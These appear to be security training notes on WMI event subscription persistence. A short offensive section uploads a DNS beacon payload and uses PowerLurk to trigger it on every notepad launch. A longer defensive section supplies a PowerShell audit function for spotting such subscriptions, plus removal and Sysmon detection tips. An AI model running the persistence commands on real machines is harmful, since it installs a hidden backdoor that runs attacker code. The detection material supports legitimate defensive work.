WMI Event Subscription Persistence
- PowerLurk
PowerLurk is a PowerShell tool for building these WMI event subscriptions (the filter, consumer and binding that make up a permanent subscription).
For example, we can upload a DNS payload into the Windows directory, import PowerLurk.ps1 and create a new WMI event subscription that will execute it whenever notepad is started:
```
cd C:\Windows
upload C:\Payloads\dns_x64.exe
powershell-import C:\Tools\PowerLurk.ps1
powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
```
We can then view the filter, consumer and binding classes created for this subscription using:

```powershell
Get-WmiEvent -Name WmiBackdoor
```

Then, to remove the backdoor:

```powershell
Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject
```
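The other side of this technique is finding it. The following is an added example written for these notes, not PowerLurk's own code or anything from the original page: it walks every `__FilterToConsumerBinding` in `root\subscription`, resolves the filter and consumer it joins, and flags the combination a backdoor like the one above needs, namely a code-executing consumer (`CommandLineEventConsumer` or `ActiveScriptEventConsumer`) bound to a process-creation or timer trigger. The function name `Get-WmiSubscriptionAudit` and the `Suspicious` heuristic are my own; it assumes an elevated Windows PowerShell session, since reading `root\subscription` requires administrator rights.

```powershell
# Added example (not PowerLurk's code): audit permanent WMI event subscriptions on the
# local host. Assumes an elevated Windows PowerShell session.

function Get-WmiSubscriptionAudit {
    [CmdletBinding()]
    param(
        # Namespace that holds permanent subscriptions; root\subscription is the standard one.
        [string]$Namespace = 'root\subscription'
    )

    # A permanent subscription is three objects: the filter (a WQL trigger query),
    # the consumer (the action to run) and the binding that ties them together.
    $filters   = @(Get-CimInstance -Namespace $Namespace -ClassName __EventFilter)
    $consumers = @(Get-CimInstance -Namespace $Namespace -ClassName __EventConsumer)
    $bindings  = @(Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding)

    foreach ($b in $bindings) {
        # Filter and Consumer are object references; pull the key Name out of the reference
        # text so this works whether it comes back as a path string or a CimInstance.
        $filterName   = if ("$($b.Filter)"   -match 'Name\s*=\s*"([^"]+)"') { $Matches[1] } else { "$($b.Filter)" }
        $consumerName = if ("$($b.Consumer)" -match 'Name\s*=\s*"([^"]+)"') { $Matches[1] } else { "$($b.Consumer)" }

        $filter   = $filters   | Where-Object Name -eq $filterName   | Select-Object -First 1
        $consumer = $consumers | Where-Object Name -eq $consumerName | Select-Object -First 1

        # Work out what the consumer actually does; these two consumer classes run arbitrary code.
        $payload = switch ($consumer.CimClass.CimClassName) {
            'CommandLineEventConsumer'  { $consumer.CommandLineTemplate }
            'ActiveScriptEventConsumer' { $consumer.ScriptText }
            default                     { $null }
        }

        [pscustomobject]@{
            FilterName    = $filterName
            Query         = $filter.Query
            ConsumerClass = $consumer.CimClass.CimClassName
            ConsumerName  = $consumerName
            Payload       = $payload
            # Heuristic (my own, not a vendor rule): code-executing consumer plus a
            # process-creation or timer trigger is the shape a persistence backdoor takes.
            Suspicious    = ($null -ne $payload) -and
                            ($filter.Query -match '__InstanceCreationEvent|Win32_Process|__TimerEvent')
        }
    }
}

# List everything, suspicious entries first, so the reviewer sees the backdoor candidates at the top.
Get-WmiSubscriptionAudit | Sort-Object Suspicious -Descending | Format-List
```

Compare flagged entries against the host's known baseline rather than treating every subscription as hostile: stock Windows ships the `SCM Event Log Filter` / `SCM Event Log Consumer` pair, which uses an `NTEventLogEventConsumer` and so carries no `Payload` here. For ongoing detection rather than point-in-time audit, Sysmon logs filter, consumer and binding creation as Event IDs 19, 20 and 21 respectively, so a `Register-MaliciousWmiEvent` run like the one above produces all three events at the moment the backdoor is installed. When cleaning up, delete the binding before the filter and consumer, which is what the `Get-WmiEvent ... | Remove-WmiObject` pipeline above does for you.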